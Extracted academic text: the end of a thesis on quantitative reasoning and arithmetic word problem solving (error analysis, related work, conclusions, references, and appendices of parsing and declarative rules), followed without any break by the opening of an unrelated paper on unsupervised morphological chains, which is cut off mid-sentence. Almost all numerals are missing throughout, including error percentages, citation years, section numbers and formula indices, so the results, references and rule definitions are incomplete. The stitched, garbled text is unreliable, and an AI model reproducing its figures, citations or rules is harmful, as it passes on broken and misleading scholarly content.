shows the major categories of errors with examples. % of the errors are due to extraneous number detection. we use a rules based on units of numbers, to detect such irrelevant numbers. as a result, we fail to detect numbers which are irrelevant due to other factors, like associated entities, or associated verb. we can potentially expand our rule based system to detect those, or replace it by a learned module like [roy and roth, ]. another major source of errors is parsing of rate components, that is, understanding “earns $ cleaning a home” should be normalized to “ $ per home”. although we learn a model for coreference function, we make several mistakes related to coreference. for the example in table . , we fail to detect the coreference between “team member” and “people”. irrelevant number detection ( %) sally had baseball cards, and were torn. sara bought of sally’s baseball cards . how many baseball cards does sally have now ? parsing rate compo- nent ( %) mary earns $ cleaning a home. how many homes did she clean, if she made dollars? coreference ( %) there are people on the green bay high track team. if a relay race is meters long, how far will each team member have to run? table . : examples of errors made by knowledge . related work our work is primarily related to three major strands of research - automatic word problem solving, semantic parsing, as well as approaches incorporating background knowledge in learning. automatic word problem solving there has been a growing interest in automatically solving math word problems, with various systems focusing on particular types of problems. [hosseini et al., ] and [mitra and baral, ] focus on addition, subtraction problems; [roy and roth, ], [roy and roth, ] as well as this work focus on arithmetic word problems; [koncel-kedziorski et al., ] looks at single equa- tion problems, and finally [kushman et al., ] handles general algebra word problems. some of these ap- proaches also try to incorporate some form of declarative or domain knowledge. [hosseini et al., ] incor- porates the transfer phenomenon by classifying verbs; [mitra and baral, ] maps problems to a set of for- mulas. both require extensive annotations for intermediate steps (verb classification for [hosseini et al., ], alignment of numbers to formulas for [mitra and baral, ], etc). in contrast, our method can handle a more general class of problems, while training only requires problem-equation pairs coupled with rate com- ponent annotations. [roy and roth, ] focus on only incorporating dimensional analysis knowledge, and handle the same class of problems as we do. in contrast, our method provides a general framework for incor- porating any form of declarative knowledge, exemplified here by incorporating types of domain knowledge. semantic parsing our work is also related to learning semantic parsers from indirect supervision [clarke et al., , liang et al., ]. the general approach here is to learn mapping of sentences to logical forms, with the only supervision being the response of executing the logical form on a knowledge base. similarly we learn to select declarative rules with only the final operation as supervision (and not which rule generated it). however, in contrast to the semantic parsing work, selection of each declarative rule usually requires reasoning across multiple sentences. also, we do not require an explicit grounding of words or phrases to logical variables. 
background knowledge in learning approaches to incorporate knowledge in learning started with explanation based learning (ebl) [dejong, , dejong, ]. ebl uses domain knowledge based on observable predicates, whereas we learn to map text to predicates of our domain knowledge. more recent approaches tried to incorporate knowledge in the form of constraints on the output [chang et al., , chang et al., , ganchev et al., ]. . conclusion in this chapter, we introduce a framework for incorporating declarative knowledge in word problem solving. in order to combine numbers or math expressions, our system selects an appropriate knowledge type, and then an appropriate declarative rule that is used to infer the necessary math operation. the selection of the declarative rule for each operation provides interpretability for each operation selected. our knowledge based approach outperforms all other systems, as well as learns better abstraction from biased datasets. beyond better generalization, we believe that relaxing the coupling between the natural language component and the “math” knowledge, also promises to eventually, simplify extending our approach to deal with a broader range of math phenomena. the current approach allows declarative rules that relate to two numbers or sub- expressions at a time. future work will involve extending this approach to include rules involving multiple numbers or sub-expressions. chapter conclusion and future work . summary quantities play an important role in everyday communication. humans naturally perform a lot of quantita- tive reasoning while reading newspapers, discussing election results with friends, and planning their budget for a vacation, etc. as a result, quantitative reasoning is essential for complete language understanding. however, in spite of its abundance in everyday conversations and interactions, little work from nlp has focused on analyzing quantitative reasoning. in this thesis, we take the first few steps in that direction. we investigate several challenges for which standard nlp tools cannot be easily used for quantitative reasoning. we address each of these challenges, outlining several key technical ideas. finally, we also build end to end robust quantitative reasoning systems, and make them available for the research community. we begin by looking at quantities at a local level in chapter . we develop a computational approach to extract quantities mentioned in free form text along with its related modifiers, and finally normalize the quantity to a standardized form. we show that correct detection and normalization can help perform several quantitative reasoning inferences, as exemplified by the quantity entailment task. we investigate sentence level numeric relations in chapter . an important challenge for capturing numeric relations is identifying the variables which participate in the relation. to capture this, we formulate the equation parsing task. we show that leveraging projectivity structures as well as using a pipeline of structured predictors can provide effective relation extraction systems. we also show that standard syntactic and semantic parsers cannot be effectively used in this domain, which motivates developing new approaches for these problems. we develop a word problem solver for arithmetic problems in chapter . the key idea is to effectively decompose the output structure in terms of the lowest common ancestors of expression trees. 
this decompo- sition allows us to perform reasoning for pairs of numbers, and effectively compose those pairwise answers, rather than considering all the numbers at a time. this helps us achieve state of the art results in arithmetic word problem solving. we address the challenge of incorporating domain knowledge in quantitative reasoning. first, to incor- porate dimensional analysis knowledge, we introduce the concept of “unit dependency graphs”. we again show its effectiveness in the domain of arithmetic word problems. we show that learning to jointly predict unit dependency graphs along with the math solution, improves the robustness of the solver. we further develop a general framework to integrate any declarative knowledge into math word problem solvers. we integrate several common math domain knowledge using this framework. we show that the knowledge based method learns robust models from limited data, as well as, learns the right abstraction from biased datasets. these solutions address a wide range of challenges for quantitative reasoning. however there are a few limitations outlined in the following section. . limitations a key limitation of our math solver work is that we focus on arithmetic word problems. the assumption is that we can combine the numbers in the problem with basic operations to get to the answer. this is usually true for word problems seen in elementary school. however there are various other forms of word problems, which require building multiple equations with several variables. unfortunately, considering multiple equations exponentially blows up the output space, which makes learning semantic structures from limited data impossible. a similar limitation exists in our equation parsing work. we make a simplifying assumption that each sentence expresses a relation among at most two variables, and uses each of the numbers in the sentence at most once. although we observed that most numeric relations follow this pattern, there are a few exceptions. currently our model will not handle these cases, without some minor modifications. . future directions the thesis shows directions to some promising areas of future research. we outline them in the following subsections. . . commonsense quantitative reasoning the thesis looks at quantitative reasoning based on local neighborhood in quantity entailment, as well as across sentences in the context of math word problems. however there are several commonsense reasoning with respect to quantities, which are not captured by the tasks discussed in this thesis. the challenge is to acquire associations of several concepts with numbers. for example, “the water is hot” implies the temperature of the water must be a high value, “the water is slightly warm” implies that the temperature is a bit high, but not as high as the last case. also, a sentence like “i could not afford the television, so i bought the radio.” implies that the cost of the television is higher than that of the radio. an interesting direction is to systematically study these inference problems. a reasonable approach can be to generalize the definition of the quantity entailment task to capture effects of the entire sentence, and not single quantities. . . unified framework for solvers currently, the arithmetic solvers that we have developed handles word problems from the elementary school level. 
an interesting direction is to use the ideas developed in this thesis to create solvers for math word problems from higher grade (like algebra word problems), or for word problems from other related domains (like physics problems). a research question here is that, is it necessary to always build a new system from scratch when we move to a new domain, or can we build some components based on our work, which are independent of the domain. the answer is likely to be affirmative. an effective approach can be to augment our knowledge based system with the appropriate inference rules for the particular domain. this approach has a good potential to generalize the work done in this thesis, and develop strategies to create solvers for any domain. . . automated math tutoring system an interesting direction can be to develop automated math tutoring systems. although there has been an increase in the number of available online courses, personalized feedback is usually lacking in these courses. however effective tutoring requires personalized interaction with students, and feedback on individual issues. an intelligent tutoring system can be the solution to this. our work can be seen as a first step towards devel- oping intelligent math tutoring systems. moving ahead, we have to model the interaction with students, and how the solver can generate step by step explanations for the solution. another direction is to automatically detect the weakness of individual students, and generate practice problems for them specifically targeting those weakness. references [gun, ] ( ). statistics that tell the story of gun violence this year. [online; accessed -april- ]. [syr, ] ( ). car bomb hits syrian refugee camp on jordan border. [online; accessed -april- ]. [chi, ] ( ). emanuel, allies spent at least $ . million to win. [online; accessed -april- ]. [artzi and zettlemoyer, ] artzi, y. and zettlemoyer, l. ( ). uw spf: the university of washington semantic parsing framework. [bakman, ] bakman, y. ( ). robust understanding of word problems with extraneous information. arxiv mathematics e-prints. [barwise and cooper, ] barwise, j. and cooper, r. ( ). generalized quantifiers and natural lan- guage. linguistics and philosophy, ( ): – . [barzilay and lapata, ] barzilay, r. and lapata, m. ( ). aggregation via set partitioning for nat- ural language generation. in proc. of hlt/naacl. [bengtson and roth, ] bengtson, e. and roth, d. ( ). understanding the value of features for coreference resolution. in proc. of the conference on empirical methods in natural language processing (emnlp). [berant et al., ] berant, j., srikumar, v., chen, p.-c., linden, a. v., harding, b., huang, b., clark, p., and manning, c. d. ( ). modeling biological processes for reading comprehension. in proceedings of emnlp. [björkelund and kuhn, ] björkelund, a. and kuhn, j. ( ). learning structured perceptrons for coreference resolution with latent antecedents and non-local features. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , baltimore, maryland. association for computational linguistics. [bobrow, ] bobrow, d. ( ). natural language input for a computer problem solving system. technical report, cambridge, ma, usa. [bundy et al., ] bundy, a., byrd, l., luger, g., mellish, c., milne, r., and palmer, m. ( ). mecho: a program to solve mechanics problems. department of artificial intelligence, university of edinburgh. [cai and yates, ] cai, q. and yates, a. ( ). 
semantic parsing freebase: towards open-domain semantic parsing. in proceedings of the second joint conference on lexical and computational semantics (*sem). [chang et al., ] chang, k., upadhyay, s., chang, m., srikumar, v., and roth, d. ( ). illinoissl: a java library for structured prediction. corr, abs/ . . [chang et al., ] chang, m., ratinov, l., and roth, d. ( ). guiding semi-supervision with constraint- driven learning. in proc. of the annual meeting of the association for computational linguistics (acl), pages – , prague, czech republic. association for computational linguistics. [chang et al., ] chang, m., srikumar, v., goldwasser, d., and roth, d. ( ). structured output learning with indirect supervision. in proc. of the international conference on machine learning (icml). [chang et al., ] chang, m.-w., ratinov, l., and roth, d. ( ). structured learning with constrained conditional models. machine learning, ( ): – . [charniak, ] charniak, e. ( ). carps, a program which solves calculus word problems. technical report, cambridge, ma, usa. [chen and manning, ] chen, d. and manning, c. d. ( ). a fast and accurate dependency parser using neural networks. in empirical methods in natural language processing (emnlp). [clark, ] clark, p. ( ). elementary school science and math tests as a driver for ai: take the aristo challenge! in aaai. [clarke et al., ] clarke, j., goldwasser, d., chang, m., and roth, d. ( ). driving semantic parsing from the world’s response. in proc. of the conference on computational natural language learning (conll). [clarke and lapata, ] clarke, j. and lapata, m. ( ). constraint-based sentence compression: an integer programming approach. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , sydney, australia. acl. [collins, ] collins, m. ( ). discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in proceedings of the conference on empirical methods for natural language processing (emnlp). [cortes and vapnik, ] cortes, c. and vapnik, v. ( ). support-vector networks. machine learning, : – . [dagan et al., ] dagan, i., glickman, o., and magnini, b., editors ( ). the pascal recognising textual entailment challenge., volume . springer-verlag, berlin. [dagan et al., ] dagan, i., roth, d., sammons, m., and zanzoto, f. m. ( ). recognizing textual entailment: models and applications. [de kleer, ] de kleer, j. ( ). multiples representations of knowledge in a mechanics problem-solver. in proceedings of the th international joint conference on artificial intelligence - volume , ijcai’ , pages – . [de marneffe et al., ] de marneffe, m.-c., rafferty, a. n., and manning, c. d. ( ). finding contra- dictions in text. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , columbus, ohio. association for computational linguistics. [dejong, ] dejong, g. ( ). investigating explanation-based learning. kluwer international series in engineering and computer science. kluwer academic publishers. [dejong, ] dejong, g. ( ). explanation-based learning. in gonzalez, t., diaz-herrera, j., and tucker, a., editors, crc computing handbook: computer science and software engineering, pages . – . . crc press, boca raton. [dellarosa, ] dellarosa, d. ( ). a computer simulation of children’s arithmetic word-problem solving. behavior research methods, instruments, & computers, ( ): – . [diane j. briars, ] diane j. briars, j. h. l. ( ). 
an integrated model of skill in solving elementary word problems. cognition and instruction, ( ): – . [fletcher, ] fletcher, c. r. ( ). understanding and solving arithmetic word problems: a computer simulation. behavior research methods, instruments, & computers, ( ): – . [forbus, ] forbus, k. ( ). qualitative process theory. artificial intelligence, : – . [freund and schapire, ] freund, y. and schapire, r. ( ). large margin classification using the perceptron algorithm. in proceedings of the annual acm workshop on computational learning theory (colt), pages – . [ganchev et al., ] ganchev, k., graça, j., gillenwater, j., and taskar, b. ( ). posterior regulariza- tion for structured latent variable models. journal of machine learning research. [gelb, ] gelb, j. p. ( ). experiments with a natural language problem-solving system. in proceedings of the nd international joint conference on artificial intelligence, ijcai’ , pages – . [goldberg and elhadad, ] goldberg, y. and elhadad, m. ( ). an efficient algorithm for easy-first non-directional dependency parsing. in proceedings of the annual meeting of the north american asso- ciation of computational linguistics (naacl). [goldwasser and roth, ] goldwasser, d. and roth, d. ( ). learning from natural instructions. in proc. of the international joint conference on artificial intelligence (ijcai). [hosseini et al., ] hosseini, m. j., hajishirzi, h., etzioni, o., and kushman, n. ( ). learning to solve arithmetic word problems with verb categorization. in proceedings of the conference on empirical methods for natural language processing (emnlp). [joachims et al., ] joachims, t., finley, t., and yu, c.-n. ( ). cutting-plane training of structural svms. machine learning, ( ): – . [kai-wei chang and roth, ] kai-wei chang, r. s. and roth, d. ( ). a constrained latent variable model for coreference resolution. in proc. of the conference on empirical methods in natural language processing (emnlp). [koncel-kedziorski et al., ] koncel-kedziorski, r., hajishirzi, h., sabharwal, a., etzioni, o., and ang, s. ( ). parsing algebraic word problems into equations. tacl. [koncel-kedziorski et al., ] koncel-kedziorski, r., roy, s., amini, a., kushman, n., and hajishirzi, h. ( ). mawps: a math word problem repository. in naacl. [kuehne, a] kuehne, s. ( a). on the representation of physical quantities in natural language text. in proceedings of twenty-sixth annual meeting of the cognitive science society. [kuehne, b] kuehne, s. ( b). understanding natural language descriptions of physical phenomena. phd thesis, northwestern university, evanston, illinois. [kushman et al., ] kushman, n., zettlemoyer, l., barzilay, r., and artzi, y. ( ). learning to automatically solve algebra word problems. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – . [kwiatkowski et al., ] kwiatkowski, t., choi, e., artzi, y., and zettlemoyer, l. ( ). scaling semantic parsers with on-the-fly ontology matching. in proceedings of the conference on empirical methods in natural language processing, pages – , seattle, washington, usa. association for computational linguistics. [liang et al., ] liang, p., jordan, m. i., and klein, d. ( ). learning dependency-based compositional semantics. in proceedings of the annual meeting of the association for computational linguistics (acl). [maccartney and manning, ] maccartney, b. and manning, c. d. ( ). modeling semantic contain- ment and exclusion in natural language inference. 
in proceedings of the nd international conference on computational linguistics (coling ), pages – , manchester, uk. coling organizing committee. [madaan et al., ] madaan, a., mittal, a., mausam, ramakrishnan, g., and sarawagi, s. ( ). nu- merical relation extraction with minimal supervision. in aaai. [marshall, ] marshall, s. p. ( ). schemas in problem solving. cambridge univ press. [mcdonald et al., ] mcdonald, r., pereira, f., ribarov, k., and hajic, j. ( ). non-projective de- pendency parsing using spanning tree algorithms. in proceedings of the conference on empirical methods for natural language processing (emnlp), pages – , vancouver, british columbia, canada. asso- ciation for computational linguistics. [miller et al., ] miller, g., beckwith, r., fellbaum, c., gross, d., and miller, k. ( ). wordnet: an on-line lexical database. international journal of lexicography, ( ): – . [mitra and baral, ] mitra, a. and baral, c. ( ). learning to use formulas to solve simple arithmetic problems. in acl. [mukherjee and garain, ] mukherjee, a. and garain, u. ( ). a review of methods for automatic understanding of natural language mathematical problems. artificial intelligence review, ( ): – . [novak, ] novak, g. s. ( ). computer understanding of physics problems stated in natural language. phd thesis, the university of texas at austin. [oberem, ] oberem, g. ( ). albert: a physics problem solving monitor and coach. in proceedings of the first inter- national conference on computer assisted learning (iccal ), iccal’ , pages – . [palmer et al., ] palmer, m., gildea, d., and xue, n. ( ). semantic role labeling, volume . morgan & claypool publishers. [pennington et al., ] pennington, j., socher, r., and manning, c. d. ( ). glove: global vectors for word representation. in proc. of emnlp. [punyakanok and roth, ] punyakanok, v. and roth, d. ( ). the use of classifiers in sequential inference. in proc. of the conference on neural information processing systems (nips), pages – . mit press. [punyakanok et al., a] punyakanok, v., roth, d., and yih, w. ( a). the necessity of syntactic parsing for semantic role labeling. in proc. of the international joint conference on artificial intelligence (ijcai), pages – . [punyakanok et al., ] punyakanok, v., roth, d., and yih, w. ( ). the importance of syntactic parsing and inference in semantic role labeling. computational linguistics, ( ). [punyakanok et al., b] punyakanok, v., roth, d., yih, w., and zimak, d. ( b). learning and inference over constrained output. in proc. of the international joint conference on artificial intelligence (ijcai), pages – . [purdy, ] purdy, w. ( ). a logic for natural language. notre dame journal of formal logic, ( ): – . [roth and yih, ] roth, d. and yih, w. ( ). a linear programming formulation for global inference in natural language tasks. in ng, h. t. and riloff, e., editors, proc. of the conference on computational natural language learning (conll), pages – . association for computational linguistics. [roth and yih, ] roth, d. and yih, w. ( ). integer linear programming inference for conditional random fields. in proc. of the international conference on machine learning (icml), pages – . [roth and zelenko, ] roth, d. and zelenko, d. ( ). part of speech tagging using a network of linear separators. in coling-acl, the th international conference on computational linguistics, pages – . [roy and roth, ] roy, s. and roth, d. ( ). solving general arithmetic word problems. in proc. 
of the conference on empirical methods in natural language processing (emnlp). [roy and roth, ] roy, s. and roth, d. ( ). unit dependency graph and its application to arithmetic word problem solving. in proc. of the conference on artificial intelligence (aaai). [roy et al., ] roy, s., vieira, t., and roth, d. ( ). reasoning about quantities in natural language. transactions of the association for computational linguistics (tacl), . [sammons et al., ] sammons, m., vydiswaran, v., and roth, d. ( ). ask not what textual entail- ment can do for you... in proc. of the annual meeting of the association for computational linguistics (acl), uppsala, sweden. association for computational linguistics. [sarawagi and cohen, ] sarawagi, s. and cohen, w. w. ( ). semi-markov conditional random fields for information extraction. in the conference on advances in neural information processing systems (nips), pages – . [seo et al., ] seo, m. j., hajishirzi, h., farhadi, a., and etzioni, o. ( ). diagram understanding in geometry questions. in aaai. [shalev-shwartz et al., ] shalev-shwartz, s., singer, y., and srebro, n. ( ). pegasos: primal esti- mated sub-gradient solver for svm. in ghahramani, z., editor, proceedings of the international conference on machine learning (icml), pages – . omnipress. [sutton and mccallum, ] sutton, c. and mccallum, a. ( ). piecewise pseudolikelihood for effi- cient training of conditional random fields. in ghahramani, z., editor, proceedings of the international conference on machine learning (icml), pages – . omnipress. [tsochantaridis et al., ] tsochantaridis, i., joachims, t., hofmann, t., and altun, y. ( ). large margin methods for structured and interdependent output variables. journal of machine learning re- search, : – . [wong and mooney, ] wong, y.-w. and mooney, r. ( ). learning synchronous grammars for se- mantic parsing with lambda calculus. in proceedings of the annual meeting of the association for com- putational linguistics (acl), pages – , prague, czech republic. association for computational linguistics. [yu and joachims, ] yu, c. and joachims, t. ( ). learning structural svms with latent variables. in proceedings of the international conference on machine learning (icml). appendix a lexicon for equation parsing we construct a high precision list of rules, to parse sentences describing mathematical concepts, for example, “difference of”, “greater than”, etc for the equation parsing task described in chapter . for each non-leaf node n of a projective equation tree, we define the following terms : . midspan(n) : the string from min(span-end(lc(n)),span-end(rc(n))) to max(span-start(lc(n)),span-start(rc(n))). . leftspan(n) : the string ending at min(span-start(lc(n)),span-start(rc(n))) and starting from the nearest trigger position on the left. . rightspan(n) : the string starting at max(span-end(lc(n)),span-end(rc(n))) and ending at the nearest trigger position on the right. . lefttoken(n) : defined only for leaves, indicates the span of text for the trigger of n. the rules in our lexicon are described using the above terms. they are as follows, ordered from low precedence to high precedence. . if leftspan(n) contains “sum of” and midspan(n) contains “and” or is the empty string, �(n) should be +. . if midspan(n) contains one of “added to”, “plus”, “more than” “taller than”, “greater than”, “larger than”, “faster than”, “longer than”, “increased”, �(n) should be +. . 
if midspan(n) contains one of “more than” “taller than”, “greater than”, “larger than”, “faster than”, “longer than”, and rightspan(n) contains “by”, �(n) should be −, and order(n) should be lr. . if leftspan(n) contains “difference of” and midspan(n) contains “and” or is the empty string, �(n) should be − and order(n) should be lr. . if leftspan(n) contains one of “exceeds”, “minus”, “decreased”, �(n) should be −, and order(n) should be lr. . if midspan(n) contains one of “subtracted” “shorter than”, “less than”, “slower than”, “smaller than”, �(n) should be −, and order(n) should be rl. . if midspan(n) contains “multiplied by”, �(n) is ×. . if leftspan(n) contains “product of” and midspan(n) contains “and”, �(n) should be ×. . if leftspan(n) contains “ratio of”, �(n) should be ÷, and order(n) should be lr. . if lefttoken(n) contains one of “thrice”, “triple”, “twice”, “double”, “half”, or if midspan(n) contains “times”, �(n) is ×. . if lefttoken(n) contains one of “thrice”, “triple”, “twice”, “double”, “half”, or if midspan(n) contains “times”, and midspan(n) contains “as”, and rightspan(n) contains “as”, operation at �(n) is ÷, and order(n) is rl. appendix b declarative rules for arithmetic word problems here, we list all the declarative rules for each knowledge type used in chapter . • transfer . [verb ∈ have] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ have] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒ addition . [verb ∈ have] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ (get ∪ construct)] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ (get ∪ construct)]∧[verb ∈ (get ∪ construct)]∧[coref(subj , subj )] ⇒ addition . [verb ∈ (get ∪ construct)] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ (give ∪ destroy)] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒ addition . [verb ∈ (give ∪ destroy)] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ (give ∪ destroy)] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒ addition we also have another rule for each rule above, which states that if coref(subj , obj ) or coref(subj , obj ) is true, and none of the verbs is construct or destroy, the final operation is changed from ad- dition to subtraction, or vice versa. to determine the order of subtraction, we always subtract the smaller number from the larger number. • dimensional analysis . [coref(unit , rate )||coref(unit , rate )] ⇒ multiplication . [coref(unit , unit )] ∧ [rate = null] ⇒ division . [coref(unit , unit )] ∧ [rate = null] ⇒ division (reverse order) • explicit math . [coref(subj , iobj )||coref(subj , iobj )] ∧ [math ∈ add||math ∈ add] ⇒ addition . [coref(subj , iobj )||coref(subj , iobj )] ∧ [math ∈ sub||math ∈ sub] ⇒ subtraction . [coref(subj , subj )] ∧ [math ∈ add||math ∈ add] ⇒ subtraction . [coref(subj , subj )] ∧ [math ∈ sub||math ∈ sub] ⇒ addition . [coref(subj , subj )] ∧ [math ∈ mul] ⇒ division (reverse order) . [coref(subj , subj )] ∧ [math ∈ mul] ⇒ division . [coref(subj , iobj )||coref(subj , iobj )] ∧ [math ∈ mul||math ∈ mul] ⇒ multiplication • part-whole relationship . [sibling(number , number )] ⇒ addition . [hyponym(number , number )] ⇒ subtraction . 
[hypernym(number , number )] ⇒ subtraction
an unsupervised method for uncovering morphological chains karthik narasimhan, regina barzilay and tommi jaakkola csail, massachusetts institute of technology {karthikn, regina, tommi}@csail.mit.edu abstract most state-of-the-art systems today produce morphological analysis based only on orthographic patterns. in contrast, we propose a model for unsupervised morphological analysis that integrates orthographic and semantic views of words.
we model word forma- tion in terms of morphological chains, from base words to the observed words, breaking the chains into parent-child relations. we use log-linear models with morpheme and word- level features to predict possible parents, in- cluding their modifications, for each word. the limited set of candidate parents for each word render contrastive estimation feasible. our model consistently matches or outper- forms five state-of-the-art systems on arabic, english and turkish. introduction morphologically related words exhibit connections at multiple levels, ranging from orthographical pat- terns to semantic proximity. for instance, the words playing and played share the same stem, but also carry similar meaning. ideally, all these comple- mentary sources of information would be taken into account when learning morphological structures. most state-of-the-art unsupervised approaches to morphological analysis are built primarily around orthographic patterns in morphologically-related words (goldwater and johnson, ; creutz and lagus, ; snyder and barzilay, ; poon et al., ). in these approaches, words are com- monly modeled as concatenations of morphemes. code is available at https://github.com/ karthikncode/morphochain. this morpheme-centric view is well-suited for un- covering distributional properties of stems and af- fixes. but it is not well-equipped to capture semantic relatedness at the word level. in contrast, earlier approaches that capture se- mantic similarity in morphological variants oper- ate solely at the word level (schone and juraf- sky, ; baroni et al., ). given two candi- date words, the proximity is assessed using standard word-distributional measures such as mutual infor- mation. however, the fact that these models do not model morphemes directly greatly limits their per- formance. in this paper, we propose a model to integrate or- thographic and semantic views. our goal is to build a chain of derivations for a current word from its base form. for instance, given a word playfully, the corresponding chain is play → playful → playfully. the word play is a base form of this derivation as it cannot be reduced any further. individual deriva- tions are obtained by adding a morpheme (ex. -ful ) to a parent word (ex. play). this addition may be implemented via a simple concatenation, or it may involve transformations. at every step of the chain, the model aims to find a parent-child pair (ex. play- playful ) such that the parent also constitutes a valid entry in the lexicon. this allows the model to di- rectly compare the semantic similarity of the parent- child pair, while also considering the orthographic properties of the morphemic combination. we model each step of a morphological chain by means of a log-linear model that enables us to in- corporate a wide range of features. at the seman- tic level, we consider the relatedness between two words using the corresponding vector embeddings. at the orthographic level, features capture whether transactions of the association for computational linguistics, vol. , pp. – , . action editor: yuji matsumoto. submission batch: / ; revision batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. https://github.com/karthikncode/morphochain https://github.com/karthikncode/morphochain the words in the chain actually occur in the corpus, how affixes are reused, as well as how the words are altered during the addition of morphemes. 
we use contrastive estimation (smith and eisner, ) to efficiently learn this model in an unsupervised manner. specifically, we require that each word has greater support among its bounded set of candidate parents than an artificially constructed neighboring word would. we evaluate our model on datasets in three lan- guages: arabic, english and turkish. we compare our performance against five state-of-the-art unsu- pervised systems: morfessor baseline (virpioja et al., ), morfessor catmap (creutz and lagus, ), agmorph (sirts and goldwater, ), the lee segmenter (lee et al., ; stallard et al., ) and the system of poon et al. ( ). our model consistently equals or outperforms these sys- tems across the three languages. for instance, on english, we obtain an . % gain in f-measure over morfessor. our experiments also demonstrate the value of semantic information. while the contribu- tion varies from % on turkish to % on the en- glish dataset, it nevertheless improves performance across all the languages. related work currently, top performing unsupervised morpholog- ical analyzers are based on the orthographic prop- erties of sub-word units (creutz and lagus, ; creutz and lagus, ; poon et al., ; sirts and goldwater, ). adding semantic information to these systems is not an easy task, as they operate at the level of individual morphemes, rather than mor- phologically related words. the value of semantic information has been demonstrated in earlier work on morphological anal- ysis. schone and jurafsky ( ) employ an lsa- based similarity measure to identify morphological variants from a list of orthographically close word pairs. the filtered pairs are then used to identify stems and affixes. based on similar intuition, baroni et al. ( ) design a method that integrates these sources of information, captured as two word pair lists, ranked based on edit distance and mutual in- formation. these lists are subsequently combined using a deterministic weighting function. in both of these algorithms, orthographic related- ness is based on simple deterministic rules. there- fore, semantic relatedness plays an essential role in the success of these methods. however, these al- gorithms do not capture distributional properties of morphemes that are critical to the success of current state-of-the-art algorithms. in contrast, we utilize a single statistical framework that seamlessly com- bines both sources of information. moreover, it al- lows us to incorporate a wide range of additional features. our work also relates to the log-linear model for morphological segmentation developed by poon et al. ( ). they propose a joint model over all words (observations) and their segmentations (hid- den), using morphemes and their contexts (charac- ter n-grams) for the features. since the space of all possible segmentation sets is huge, learning and in- ference are quite involved. they use techniques like contrastive estimation, sampling and simulated an- nealing. in contrast, our formulation does not re- sult in such a large search space. for each word, the number of parent candidates is bounded by its length multiplied by the number of possible trans- formations. therefore, contrastive estimation can be implemented via enumeration, and does not re- quire sampling. moreover, operating at the level of words (rather than morphemes) enables us to incor- porate semantic and word-level features. most recently, work by sirts and goldwater ( ) uses adaptor grammars for minimally su- pervised segmentation. 
by defining a morphological grammar consisting of zero or more prefixes, stems and suffixes, they induce segmentations over words in both unsupervised and semi-supervised settings. while their model (agmorph) builds up a word by combining morphemes in the form of a parse tree, we operate at the word level and build up the final word via intermediate words in the chain. in other related work, dreyer and eisner ( ) tackle the problem of recovering morphological paradigms and inflectional principles. they use a bayesian generative model with a log-linear framework, using expressive features, over pairs of strings. their work, however, handles a different task from ours and requires a small amount of an- notated data to seed the model. in this work, we make use of semantic infor- mation to help morphological analysis. lee et al. ( ) present a model that takes advantage of syn- tactic context to perform better morphological seg- mentation. stallard et al. ( ) improve on this ap- proach using the technique of maximum marginal decoding to reduce noise. their best system con- siders entire sentences, while our approach (and the morphological analyzers described above) operates at the vocabulary level without regarding sentence context. hence, though their work is not directly comparable to ours, it presents an interesting orthog- onal view to the problem. model . definitions and framework we use morphological chains to model words in the language. a morphological chain is a short sequence of words that starts from the base word and ends up in a morphological variant. each node in the chain is, by assumption, a valid word. we refer to the word that is morphologically changed as the parent word and its morphological variant as the child word. a word that does not have any morphological parent is a base word (e.g., words like play, chat, run ). words in a chain (other than the base word) are created from their parents by adding morphemes (prefixes, suffixes, or other words). for example, a morphological chain that ends up in the word in- ternationally could be nation → national → inter- national → internationally. the base word for this chain is nation. note that the same word can belong to multiple morphological chains. for example, the word national appears also as part of another chain that ends up in nationalize. these chains are treated separately but with shared statistical support for the common parts. for this reason, our model breaks morphological chains into possible parent-child re- lations such as (nation, national ). we use a log-linear model for predicting parent- child pairs. a log-linear model allows an easy, effi- cient way of incorporating several different features pertaining to parent-child relations. in our case, we leverage both orthographic and semantic patterns to encode representative features. we distinguish base words from morphological roots which do not strictly speaking have to be valid words in the language. segment cosine similarity p . pl - . pla - . play . playe . player . table : cosine similarities between word vectors of various segments of the word player and the vector of player. a log-linear model consists of a set of features represented by a feature vector φ : w ×z → rd and a corresponding weight vector θ ∈ rd. here, w is a set of words and z is the set of candidates for words in w, that includes the parents as well as their types. 
specifically, a candidate is a (parent, type) pair, where the type variable keeps track of the type of morphological change (or the lack thereof if there is no parent) as we go from the parent to the child. in our experiments, z is obtained by collecting to- gether all sub-words created by splitting observed words in w at all different points. for instance, if we take the word cars, the candidates obtained by splitting would include (car, suffix), (ca, suffix), (c, suffix), (ars, prefix), (rs, prefix) and (s, prefix). note that the parent may undergo changes as it is joined with the affix and thus, there are more choices for the parent than just the ones obtained by splitting. hence, to the set of candidates, we also add modified sub-words where transformations in- clude character repetition (plan → planning ), dele- tion (decide → deciding ) or replacement (carry → carried ). following the above example for the word cars, we get candidates like (cat, modify) and (cart, delete). each word also has a stop candidate (-, stop), which is equivalent to considering it as a base word with no parent. let us define the probability of a particular word- candidate pair (w ∈ w,z ∈ z) as p(w,z) ∝ eθ·φ(w,z). the conditional probability of a candidate we found that restricting the set of parents to sub-words that are at least half the length of the original word helped im- prove the performance of the system. z given a word w is then p(z|w) = e θ·φ(w,z) ∑ z′∈c(w) e θ·φ(w,z′) , z ∈ c(w) where c(w) ⊂z refers to the set of possible candi- dates (parents and their types) for the word w ∈w. in order to generate a possible ancestral chain for a word, we recursively predict parents until the word is predicted to be a base word. in our model, these choices are included in the set of candidates for the specific word, and their likelihood is controlled by the type related features. details of these and other features are given in section . . . features this section provides an overview of the features used in our model. the features are defined for a given word w, parent p and 